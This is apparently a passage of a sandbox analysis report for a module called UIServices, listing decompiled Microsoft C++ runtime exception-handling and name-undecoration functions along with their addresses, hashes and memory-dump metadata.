                                                      • Part of subcall function 00007FFC23C664B0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFC23C620FE), ref: 00007FFC23C664BE
                                                    • EncodePointer.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,00007FFC23C62ED3), ref: 00007FFC23C6347C
                                                    • _CallSETranslator.LIBVCRUNTIME ref: 00007FFC23C634CB
                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,00000000,?,?,?,?,00007FFC23C62ED3), ref: 00007FFC23C6363F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: abort$CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 2889003569-2084237596
                                                    • Opcode ID: c6edc7f7cb8306c103728bca328dc039afe248f88da60de6e3abdbadd5903433
                                                    • Instruction ID: 6fd4bed33811dc246579f573323f39ad7112784ddf0a8eee5f2c56c50fbd15e5
                                                    • Opcode Fuzzy Hash: c6edc7f7cb8306c103728bca328dc039afe248f88da60de6e3abdbadd5903433
                                                    • Instruction Fuzzy Hash: 60614E32B08B598AE721DF69D8403AD77A0F784B88F044265DF5D27B69DF38D055CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 61%
                                                    			E00007FFC7FFC23C652C0(void* __edi, intOrPtr* __rcx, void* __rdx, void* __r9) {
                                                    				signed int _v72;
                                                    				intOrPtr _v92;
                                                    				intOrPtr _v96;
                                                    				signed long long _v104;
                                                    				signed long long _v112;
                                                    				void* _v120;
                                                    				signed long long _v128;
                                                    				intOrPtr _v136;
                                                    				void* _t43;
                                                    				void* _t44;
                                                    				void* _t50;
                                                    				intOrPtr _t53;
                                                    				signed long long _t71;
                                                    				signed long long _t72;
                                                    				void* _t73;
                                                    				intOrPtr _t74;
                                                    				intOrPtr* _t75;
                                                    				intOrPtr _t76;
                                                    				intOrPtr* _t97;
                                                    				signed long long _t99;
                                                    
                                                    				_t99 =  &_v120;
                                                    				_t71 =  *0x23c74038; // 0x577607bbd382
                                                    				_t72 = _t71 ^ _t99;
                                                    				_v72 = _t72;
                                                    				_v104 = _t99;
                                                    				if (__rcx == 0) goto 0x23c65453;
                                                    				_t75 =  *((intOrPtr*)(__rcx));
                                                    				if (__rdx == 0) goto 0x23c65302;
                                                    				if ( *((char*)(__rdx + 0x10)) != 0) goto 0x23c65324;
                                                    				if ( *_t75 == 0xe0434f4d) goto 0x23c65470;
                                                    				if ( *_t75 == 0xe0434352) goto 0x23c65470;
                                                    				if ((sil & 0x00000040) == 0) goto 0x23c65470;
                                                    				if ( *_t75 != 0xe06d7363) goto 0x23c65453;
                                                    				if ( *((intOrPtr*)(_t75 + 0x18)) != 4) goto 0x23c65453;
                                                    				if ( *((intOrPtr*)(_t75 + 0x20)) - 0x19930520 - 2 > 0) goto 0x23c65453;
                                                    				if ( *((long long*)(_t75 + 0x30)) != 0) goto 0x23c6536b;
                                                    				E00007FFC7FFC23C664B0(_t72);
                                                    				if ( *((long long*)(_t72 + 0x20)) == 0) goto 0x23c65453;
                                                    				E00007FFC7FFC23C664B0(_t72);
                                                    				_t76 =  *((intOrPtr*)(_t72 + 0x20));
                                                    				E00007FFC7FFC23C6F084(_t72,  *((intOrPtr*)(_t76 + 0x38)));
                                                    				E00007FFC7FFC23C6F044(_t72);
                                                    				_v112 = _t72;
                                                    				__imp__RtlPcToFileHeader();
                                                    				_v128 = _t72;
                                                    				E00007FFC7FFC23C6F06C(_t72, _t72);
                                                    				_v92 = __edi - _v128;
                                                    				asm("bts esi, 0x1f");
                                                    				_v96 = r8d;
                                                    				E00007FFC7FFC23C6F058(_t72);
                                                    				_t73 = _t72 + 4;
                                                    				_t97 =  *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x30)) + 0xc)) + _t73;
                                                    				_v120 = _t97;
                                                    				E00007FFC7FFC23C6F058(_t73);
                                                    				_t53 =  *((intOrPtr*)(_t73 +  *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x30)) + 0xc))));
                                                    				_v136 = _t53;
                                                    				if (_t53 <= 0) goto 0x23c6544b;
                                                    				_t43 = E00007FFC7FFC23C6F058(_t73);
                                                    				_t74 =  *_t97;
                                                    				0x23c65260();
                                                    				if (_t43 == 0) goto 0x23c6543a;
                                                    				_t44 = E00007FFC7FFC23C664B0(_t74);
                                                    				 *((intOrPtr*)(_t74 + 0x30)) =  *((intOrPtr*)(_t74 + 0x30)) + 1;
                                                    				if (__r9 == 0) goto 0x23c65420;
                                                    				0x23c65240();
                                                    				E00007FFC7FFC23C61940(_t44, _v104, 0x23c65433);
                                                    				goto 0x23c65455;
                                                    				_v136 = _t53 - 1;
                                                    				_v120 = _t97 + 4;
                                                    				goto 0x23c653d9;
                                                    				E00007FFC7FFC23C6F06C(_t74, _t72);
                                                    				return E00007FFC7FFC23C6F5B0(_t50, _t74, _v72 ^ _t99, 0x23c65433);
                                                    			}























                                                    0x7ffc23c652ca
                                                    0x7ffc23c652ce
                                                    0x7ffc23c652d5
                                                    0x7ffc23c652d8
                                                    0x7ffc23c652dd
                                                    0x7ffc23c652ee
                                                    0x7ffc23c652f4
                                                    0x7ffc23c652fa
                                                    0x7ffc23c65300
                                                    0x7ffc23c65308
                                                    0x7ffc23c65314
                                                    0x7ffc23c6531e
                                                    0x7ffc23c6532a
                                                    0x7ffc23c65334
                                                    0x7ffc23c65345
                                                    0x7ffc23c65350
                                                    0x7ffc23c65352
                                                    0x7ffc23c6535c
                                                    0x7ffc23c65362
                                                    0x7ffc23c65367
                                                    0x7ffc23c6536f
                                                    0x7ffc23c65374
                                                    0x7ffc23c6537c
                                                    0x7ffc23c65389
                                                    0x7ffc23c6538f
                                                    0x7ffc23c65397
                                                    0x7ffc23c653a0
                                                    0x7ffc23c653a4
                                                    0x7ffc23c653a8
                                                    0x7ffc23c653ac
                                                    0x7ffc23c653b9
                                                    0x7ffc23c653bd
                                                    0x7ffc23c653c0
                                                    0x7ffc23c653c5
                                                    0x7ffc23c653d2
                                                    0x7ffc23c653d5
                                                    0x7ffc23c653db
                                                    0x7ffc23c653dd
                                                    0x7ffc23c653e5
                                                    0x7ffc23c653f7
                                                    0x7ffc23c653fe
                                                    0x7ffc23c65400
                                                    0x7ffc23c65405
                                                    0x7ffc23c6540b
                                                    0x7ffc23c6541b
                                                    0x7ffc23c6542c
                                                    0x7ffc23c65438
                                                    0x7ffc23c6543c
                                                    0x7ffc23c65444
                                                    0x7ffc23c65449
                                                    0x7ffc23c6544e
                                                    0x7ffc23c6546f

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: FileHeader
                                                    • String ID: MOC$RCC$csm$csm
                                                    • API String ID: 104395404-1441736206
                                                    • Opcode ID: 2cec3f267395be9d96b953e49dea6fc3c58bea9edd68278d49fbbe80deba14be
                                                    • Instruction ID: bedfb925cb1fd05065f5f196f4a94fbca1aaf5e6388541498a6865d05585e420
                                                    • Opcode Fuzzy Hash: 2cec3f267395be9d96b953e49dea6fc3c58bea9edd68278d49fbbe80deba14be
                                                    • Instruction Fuzzy Hash: 90517F72B0862A86EB609F2AD84137D26A0FFC4B55F2442B5EF4D66789CF3CE441CE51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 92%
                                                    			E00007FFC7FFC23C69BAC(void* __edx, long long __rbx, long long* __rcx, long long __rdi, long long __rsi, void* __r10, void* __r11, long long __r14) {
                                                    				void* _v8;
                                                    				char _v24;
                                                    				char _v40;
                                                    				char _v56;
                                                    				intOrPtr _v64;
                                                    				char _v72;
                                                    				void* _t31;
                                                    				void* _t34;
                                                    				void* _t35;
                                                    				signed int _t36;
                                                    				signed int _t37;
                                                    				void* _t40;
                                                    				void* _t54;
                                                    				char* _t65;
                                                    				char* _t66;
                                                    				char _t78;
                                                    				long long* _t85;
                                                    				void* _t92;
                                                    
                                                    				_t54 = _t92;
                                                    				 *((long long*)(_t54 + 8)) = __rbx;
                                                    				 *((long long*)(_t54 + 0x10)) = __rsi;
                                                    				 *((long long*)(_t54 + 0x18)) = __rdi;
                                                    				 *((long long*)(_t54 + 0x20)) = __r14;
                                                    				r14d = 0;
                                                    				_t85 = __rcx;
                                                    				_t65 =  *0x23c74360; // 0x0
                                                    				sil = __edx;
                                                    				if ( *_t65 != 0x51) goto 0x23c69beb;
                                                    				_t66 = _t65 + 1;
                                                    				 *0x23c74360 = _t66;
                                                    				_t78 =  *_t66;
                                                    				if (__edx != 0) goto 0x23c69c06;
                                                    				 *((intOrPtr*)(__rcx + 8)) = r14d;
                                                    				 *__rcx = 0x23c71ac0;
                                                    				goto 0x23c69cd9;
                                                    				_t6 = _t78 - 0x30; // -48
                                                    				if (_t6 - 9 > 0) goto 0x23c69c6a;
                                                    				 *0x23c74360 = _t66 + 1;
                                                    				if (1 == 0) goto 0x23c69c52;
                                                    				_t7 = _t78 - 0x2f; // -47
                                                    				E00007FFC7FFC23C66E4C(_t7,  &_v56, _t7, __r10);
                                                    				E00007FFC7FFC23C66CF4(0x23c71ac0,  &_v40, 0x23c74008);
                                                    				_t31 = E00007FFC7FFC23C66F74(0x23c71ac0,  &_v72, 0x23c71ac0);
                                                    				goto 0x23c69c5f;
                                                    				E00007FFC7FFC23C66E4C(_t31,  &_v24,  &_v72 - 0x2f, __r10);
                                                    				 *_t85 = _v72;
                                                    				goto 0x23c69cd6;
                                                    				_t34 = E00007FFC7FFC23C6D614(_t40,  &_v72,  &_v72 - 0x2f);
                                                    				if (_v64 == r14b) goto 0x23c69cb6;
                                                    				 *0x23c74360 =  *0x23c74360 + 1;
                                                    				if (sil == 0) goto 0x23c69ca3;
                                                    				if (1 == 0) goto 0x23c69c98;
                                                    				_t35 = E00007FFC7FFC23C66DA4(_t34,  &_v24, _v72, __r11);
                                                    				goto 0x23c69c2a;
                                                    				_t36 = E00007FFC7FFC23C66DA4(_t35,  &_v56, _v72, __r11);
                                                    				goto 0x23c69c5f;
                                                    				if (1 == 0) goto 0x23c69cb0;
                                                    				goto 0x23c69c25;
                                                    				goto 0x23c69c5a;
                                                    				_t59 =  !=  ? __r14 : 0x23c71ac0;
                                                    				 *_t85 =  !=  ? __r14 : 0x23c71ac0;
                                                    				asm("sbb eax, eax");
                                                    				_t37 = _t36 & 0x00000002;
                                                    				 *(_t85 + 8) = _t37;
                                                    				return _t37;
                                                    			}





















                                                    0x7ffc23c69bac
                                                    0x7ffc23c69baf
                                                    0x7ffc23c69bb3
                                                    0x7ffc23c69bb7
                                                    0x7ffc23c69bbb
                                                    0x7ffc23c69bc7
                                                    0x7ffc23c69bca
                                                    0x7ffc23c69bcd
                                                    0x7ffc23c69bd4
                                                    0x7ffc23c69bdd
                                                    0x7ffc23c69bdf
                                                    0x7ffc23c69be4
                                                    0x7ffc23c69beb
                                                    0x7ffc23c69bf1
                                                    0x7ffc23c69bfa
                                                    0x7ffc23c69bfe
                                                    0x7ffc23c69c01
                                                    0x7ffc23c69c06
                                                    0x7ffc23c69c0b
                                                    0x7ffc23c69c10
                                                    0x7ffc23c69c19
                                                    0x7ffc23c69c1b
                                                    0x7ffc23c69c25
                                                    0x7ffc23c69c38
                                                    0x7ffc23c69c47
                                                    0x7ffc23c69c50
                                                    0x7ffc23c69c5a
                                                    0x7ffc23c69c65
                                                    0x7ffc23c69c68
                                                    0x7ffc23c69c6e
                                                    0x7ffc23c69c77
                                                    0x7ffc23c69c79
                                                    0x7ffc23c69c87
                                                    0x7ffc23c69c8b
                                                    0x7ffc23c69c91
                                                    0x7ffc23c69c96
                                                    0x7ffc23c69c9c
                                                    0x7ffc23c69ca1
                                                    0x7ffc23c69ca5
                                                    0x7ffc23c69cab
                                                    0x7ffc23c69cb4
                                                    0x7ffc23c69cc8
                                                    0x7ffc23c69cce
                                                    0x7ffc23c69cd1
                                                    0x7ffc23c69cd3
                                                    0x7ffc23c69cd6
                                                    0x7ffc23c69cf5

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: NameName::$Name::operator+
                                                    • String ID:
                                                    • API String ID: 826178784-0
                                                    • Opcode ID: be68444817dde28ece6064d07fb383e8d3edc1c4f56f1be194b1a347b742f1a4
                                                    • Instruction ID: 3ab1cab8b54e72220494d4157c4d22ce7c22b44649e212e766312af1d0eb4d4b
                                                    • Opcode Fuzzy Hash: be68444817dde28ece6064d07fb383e8d3edc1c4f56f1be194b1a347b742f1a4
                                                    • Instruction Fuzzy Hash: 1B418132B08A6A94EB18DB29DC801BC37B4FF96B90B5442B2DE4D67395DF38E515C720
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 73%
                                                    			E00007FFC7FFC23C63DE4(void* __ecx, void* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long __rsi, void* __r8, void* __r9) {
                                                    				void* __rdi;
                                                    				void* __r14;
                                                    				void* _t73;
                                                    				intOrPtr _t78;
                                                    				void* _t102;
                                                    				unsigned int _t105;
                                                    				void* _t132;
                                                    				intOrPtr _t136;
                                                    				intOrPtr* _t141;
                                                    				signed char* _t145;
                                                    				long long _t146;
                                                    				void* _t170;
                                                    				signed char* _t171;
                                                    				long long _t175;
                                                    				void* _t176;
                                                    				void* _t178;
                                                    				void* _t179;
                                                    				void* _t194;
                                                    				long long _t195;
                                                    				void* _t197;
                                                    
                                                    				_t132 = __rax;
                                                    				 *((long long*)(_t178 + 8)) = __rbx;
                                                    				 *((long long*)(_t178 + 0x10)) = _t175;
                                                    				 *((long long*)(_t178 + 0x18)) = __rsi;
                                                    				_t179 = _t178 - 0x80;
                                                    				_t141 = __rcx;
                                                    				_t176 = __r9;
                                                    				_t195 = __rdx;
                                                    				E00007FFC7FFC23C61894(_t73, __r8);
                                                    				E00007FFC7FFC23C664B0(_t132);
                                                    				_t171 =  *((intOrPtr*)(_t179 + 0xc0));
                                                    				r8d = 0x80000029;
                                                    				r9d = 0x80000026;
                                                    				if ( *((intOrPtr*)(_t132 + 0x40)) != 0) goto 0x23c63e5e;
                                                    				if ( *__rcx == 0xe06d7363) goto 0x23c63e5e;
                                                    				if ( *__rcx != r8d) goto 0x23c63e50;
                                                    				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x23c63e55;
                                                    				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x23c63e5e;
                                                    				if ( *__rcx == r9d) goto 0x23c63e5e;
                                                    				if (( *_t171 & 0x00000020) != 0) goto 0x23c6404b;
                                                    				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x23c63f7d;
                                                    				if (_t171[8] == 0) goto 0x23c6404b;
                                                    				if ( *(_t171[8] +  *((intOrPtr*)(__r9 + 8)) -  *((char*)(__r8 + 0x7ffc23c70410)) - 4) >>  *(__r8 + 0x7ffc23c70420) == 0) goto 0x23c6404b;
                                                    				if ( *((intOrPtr*)(_t179 + 0xc8)) != 0) goto 0x23c6404b;
                                                    				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x23c63f6a;
                                                    				if ( *__rcx != r9d) goto 0x23c63f22;
                                                    				_t145 = _t171;
                                                    				_t78 = E00007FFC7FFC23C6E250(_t102, __rcx, _t145, __r9, _t171, __rsi,  *((intOrPtr*)(__r9 + 0x20)), _t195, _t197, _t194);
                                                    				r9d = _t78;
                                                    				if (_t78 - 0xffffffff < 0) goto 0x23c63f63;
                                                    				if (_t171[8] == 0) goto 0x23c63f0a;
                                                    				_t105 =  *(_t171[8] +  *((intOrPtr*)(_t176 + 8)) - _t145[0x7ffc23c70410] - 4) >> _t145[0x7ffc23c70420];
                                                    				if (r9d - _t105 >= 0) goto 0x23c63f63;
                                                    				_t146 = _t195;
                                                    				E00007FFC7FFC23C64ACC(_t146, _t176, _t171);
                                                    				goto 0x23c6404b;
                                                    				if ( *__rcx != r8d) goto 0x23c63f6a;
                                                    				r9d =  *((intOrPtr*)(__rcx + 0x38));
                                                    				if (r9d - 0xffffffff < 0) goto 0x23c63f63;
                                                    				if (r9d -  *(_t171[8] +  *((intOrPtr*)(_t176 + 8)) -  *((char*)(_t146 + 0x7ffc23c70410)) - 4) >>  *(_t146 + 0x7ffc23c70420) >= 0) goto 0x23c63f63;
                                                    				goto 0x23c63f12;
                                                    				abort();
                                                    				asm("int3");
                                                    				E00007FFC7FFC23C6E804( *((char*)(_t146 + 0x7ffc23c70410)), _t195, _t171);
                                                    				goto 0x23c6404b;
                                                    				E00007FFC7FFC23C640EC(_t179 + 0x50, _t171,  *((intOrPtr*)(_t176 + 8)));
                                                    				if ( *((intOrPtr*)(_t179 + 0x50)) != _t105) goto 0x23c63f9d;
                                                    				if (( *_t171 & 0x00000040) == 0) goto 0x23c6404b;
                                                    				if ( *_t141 != 0xe06d7363) goto 0x23c64012;
                                                    				if ( *((intOrPtr*)(_t141 + 0x18)) - 3 < 0) goto 0x23c64012;
                                                    				if ( *((intOrPtr*)(_t141 + 0x20)) - 0x19930522 <= 0) goto 0x23c64012;
                                                    				_t136 =  *((intOrPtr*)(_t141 + 0x30));
                                                    				if ( *((intOrPtr*)(_t136 + 8)) == _t105) goto 0x23c64012;
                                                    				E00007FFC7FFC23C6F058(_t136);
                                                    				if (_t136 +  *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x30)) + 8)) == 0) goto 0x23c64012;
                                                    				 *(_t179 + 0x38) =  *(_t179 + 0xd8) & 0x000000ff;
                                                    				 *((long long*)(_t179 + 0x30)) =  *((intOrPtr*)(_t179 + 0xd0));
                                                    				 *((intOrPtr*)(_t179 + 0x28)) =  *((intOrPtr*)(_t179 + 0xc8));
                                                    				 *(_t179 + 0x20) = _t171;
                                                    				 *0x23c701a0(_t170);
                                                    				goto 0x23c64050;
                                                    				 *(_t179 + 0x38) =  *((intOrPtr*)(_t179 + 0xd0));
                                                    				 *((intOrPtr*)(_t179 + 0x30)) =  *((intOrPtr*)(_t179 + 0xc8));
                                                    				 *((char*)(_t179 + 0x28)) =  *(_t179 + 0xd8);
                                                    				 *(_t179 + 0x20) = _t171;
                                                    				E00007FFC7FFC23C62F2C(_t141, _t195, 0x7ffc23c60000, _t176);
                                                    				return 1;
                                                    			}























                                                    0x7ffc23c63de4
                                                    0x7ffc23c63de4
                                                    0x7ffc23c63de9
                                                    0x7ffc23c63dee
                                                    0x7ffc23c63df8
                                                    0x7ffc23c63dff
                                                    0x7ffc23c63e02
                                                    0x7ffc23c63e0b
                                                    0x7ffc23c63e0e
                                                    0x7ffc23c63e13
                                                    0x7ffc23c63e18
                                                    0x7ffc23c63e22
                                                    0x7ffc23c63e28
                                                    0x7ffc23c63e31
                                                    0x7ffc23c63e39
                                                    0x7ffc23c63e3e
                                                    0x7ffc23c63e44
                                                    0x7ffc23c63e4e
                                                    0x7ffc23c63e53
                                                    0x7ffc23c63e58
                                                    0x7ffc23c63e62
                                                    0x7ffc23c63e6b
                                                    0x7ffc23c63ea1
                                                    0x7ffc23c63eae
                                                    0x7ffc23c63eb8
                                                    0x7ffc23c63ec1
                                                    0x7ffc23c63eca
                                                    0x7ffc23c63ecd
                                                    0x7ffc23c63ed2
                                                    0x7ffc23c63ed8
                                                    0x7ffc23c63ee1
                                                    0x7ffc23c63f08
                                                    0x7ffc23c63f0d
                                                    0x7ffc23c63f0f
                                                    0x7ffc23c63f18
                                                    0x7ffc23c63f1d
                                                    0x7ffc23c63f25
                                                    0x7ffc23c63f27
                                                    0x7ffc23c63f2f
                                                    0x7ffc23c63f5b
                                                    0x7ffc23c63f61
                                                    0x7ffc23c63f63
                                                    0x7ffc23c63f69
                                                    0x7ffc23c63f73
                                                    0x7ffc23c63f78
                                                    0x7ffc23c63f89
                                                    0x7ffc23c63f92
                                                    0x7ffc23c63f97
                                                    0x7ffc23c63fa3
                                                    0x7ffc23c63fa9
                                                    0x7ffc23c63fb2
                                                    0x7ffc23c63fb4
                                                    0x7ffc23c63fbb
                                                    0x7ffc23c63fbd
                                                    0x7ffc23c63fd0
                                                    0x7ffc23c63fdd
                                                    0x7ffc23c63fef
                                                    0x7ffc23c63ffe
                                                    0x7ffc23c64005
                                                    0x7ffc23c6400a
                                                    0x7ffc23c64010
                                                    0x7ffc23c6401d
                                                    0x7ffc23c6402f
                                                    0x7ffc23c6403d
                                                    0x7ffc23c64041
                                                    0x7ffc23c64046
                                                    0x7ffc23c6406c

                                                    APIs
                                                      • Part of subcall function 00007FFC23C664B0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFC23C620FE), ref: 00007FFC23C664BE
                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFC23C63F63
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000002F.00000002.404539781.00007FFC23C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFC23C60000, based on PE: true
                                                    • Associated: 0000002F.00000002.404521676.00007FFC23C60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404566101.00007FFC23C70000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404586308.00007FFC23C74000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404607794.00007FFC23C75000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    • Associated: 0000002F.00000002.404624421.00007FFC23C77000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_47_2_7ffc23c60000_UIServices.jbxd
                                                    Similarity
                                                    • API ID: abort
                                                    • String ID: $csm$csm
                                                    • API String ID: 4206212132-1512788406
                                                    • Opcode ID: b2e7f24d3f4019f58ad6359e40fd20a52bbceefe3fddcea22dc20a17f2dda2c5
                                                    • Instruction ID: af1e32a277024e5a5c117ded9109aa53f7d9ea5491f18307674d1f1ba0852552
                                                    • Opcode Fuzzy Hash: b2e7f24d3f4019f58ad6359e40fd20a52bbceefe3fddcea22dc20a17f2dda2c5
                                                    • Instruction Fuzzy Hash: 8971E4727086A586DB208F29D88037D7BA0FB81F88F048275EE9D67A99CF3CD451CB11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 61%
                                                    			E00007FFC7FFC23C63BBC(void* __ecx, long long __rbx, intOrPtr* __rcx, long long __rdx, long long __rdi, long long __rsi, long long __rbp, long long __r8, long long __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
                                                    				signed int _v32;
                                                    				long long _v40;
                                                    				char _v48;
                                                    				signed int* _v56;
                                                    				void* _t55;
                                                    				intOrPtr _t60;
                                                    				signed int _t101;
                                                    				void* _t109;
                                                    				intOrPtr _t111;
                                                    				signed int* _t116;
                                                    				intOrPtr* _t136;
                                                    				long long _t139;
                                                    				long long _t142;
                                                    				void* _t144;
                                                    				void* _t158;
                                                    				long long _t159;
                                                    
                                                    				_t109 = _t144;
                                                    				 *((long long*)(_t109 + 8)) = __rbx;
                                                    				 *((long long*)(_t109 + 0x10)) = __rbp;
                                                    				 *((long long*)(_t109 + 0x18)) = __rsi;
                                                    				 *((long long*)(_t109 + 0x20)) = __rdi;
                                                    				_t136 = __rcx;
                                                    				_t139 = __r9;
                                                    				_t159 = __r8;
                                                    				_t142 = __rdx;
                                                    				E00007FFC7FFC23C61894(_t55, __r8);
                                                    				E00007FFC7FFC23C664B0(_t109);
                                                    				_t116 = _a40;
                                                    				if ( *((intOrPtr*)(_t109 + 0x40)) != 0) goto 0x23c63c3e;
                                                    				if ( *__rcx == 0xe06d7363) goto 0x23c63c3e;
                                                    				if ( *__rcx != 0x80000029) goto 0x23c63c22;
                                                    				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x23c63c26;
                                                    				goto 0x23c63c24;
                                                    				if ( *__rcx == 0x80000026) goto 0x23c63c3e;
                                                    				if (( *_t116 & 0x1fffffff) - 0x19930522 < 0) goto 0x23c63c3e;
                                                    				if ((_t116[9] & 0x00000001) != 0) goto 0x23c63dc4;
                                                    				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x23c63ccd;
                                                    				if (_t116[1] == 0) goto 0x23c63dc4;
                                                    				if (_a48 != 0) goto 0x23c63dc4;
                                                    				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x23c63cba;
                                                    				if ( *__rcx != 0x80000026) goto 0x23c63c99;
                                                    				_t60 = E00007FFC7FFC23C6E1E8(_t116, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
                                                    				if (_t60 - 0xffffffff < 0) goto 0x23c63cb3;
                                                    				if (_t60 - _t116[1] >= 0) goto 0x23c63cb3;
                                                    				r9d = _t60;
                                                    				E00007FFC7FFC23C64940(_t109, _t142, __r9, _t116);
                                                    				goto 0x23c63dc4;
                                                    				if ( *_t136 != 0x80000029) goto 0x23c63cba;
                                                    				r9d =  *((intOrPtr*)(_t136 + 0x38));
                                                    				if (r9d - 0xffffffff < 0) goto 0x23c63cb3;
                                                    				if (r9d - _t116[1] >= 0) goto 0x23c63cb3;
                                                    				goto 0x23c63c89;
                                                    				abort();
                                                    				asm("int3");
                                                    				E00007FFC7FFC23C6E7A0(0x80000029, r9d - _t116[1], _t109, _t116, __r9, __r9, _t116);
                                                    				goto 0x23c63dc4;
                                                    				if (_t116[3] != 0) goto 0x23c63d15;
                                                    				if (( *_t116 & 0x1fffffff) - 0x19930521 < 0) goto 0x23c63cf5;
                                                    				_t101 = _t116[8];
                                                    				if (_t101 == 0) goto 0x23c63cf5;
                                                    				E00007FFC7FFC23C6F044(_t109);
                                                    				if (_t101 != 0) goto 0x23c63d15;
                                                    				if (( *_t116 & 0x1fffffff) - 0x19930522 < 0) goto 0x23c63dc4;
                                                    				if ((_t116[9] >> 0x00000002 & 0x00000001) == 0) goto 0x23c63dc4;
                                                    				if ( *_t136 != 0xe06d7363) goto 0x23c63d8b;
                                                    				if ( *((intOrPtr*)(_t136 + 0x18)) - 3 < 0) goto 0x23c63d8b;
                                                    				if ( *((intOrPtr*)(_t136 + 0x20)) - 0x19930522 <= 0) goto 0x23c63d8b;
                                                    				_t111 =  *((intOrPtr*)(_t136 + 0x30));
                                                    				if ( *((intOrPtr*)(_t111 + 8)) == 0) goto 0x23c63d8b;
                                                    				E00007FFC7FFC23C6F058(_t111);
                                                    				if (_t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)) == 0) goto 0x23c63d8b;
                                                    				_v32 = _a64 & 0x000000ff;
                                                    				_v40 = _a56;
                                                    				_v48 = _a48;
                                                    				_v56 = _t116;
                                                    				 *0x23c701a0(_t158);
                                                    				goto 0x23c63dc9;
                                                    				_v32 = _a56;
                                                    				_v40 = _a48;
                                                    				_v48 = _a64;
                                                    				_v56 = _t116;
                                                    				E00007FFC7FFC23C62A44(_a48, _t136, _t142, _t159, _t139);
                                                    				return 1;
                                                    			}



















                                                    0x7ffc23c63bbc
                                                    0x7ffc23c63bbf
                                                    0x7ffc23c63bc3
                                                    0x7ffc23c63bc7
                                                    0x7ffc23c63bcb
                                                    0x7ffc23c63bd5
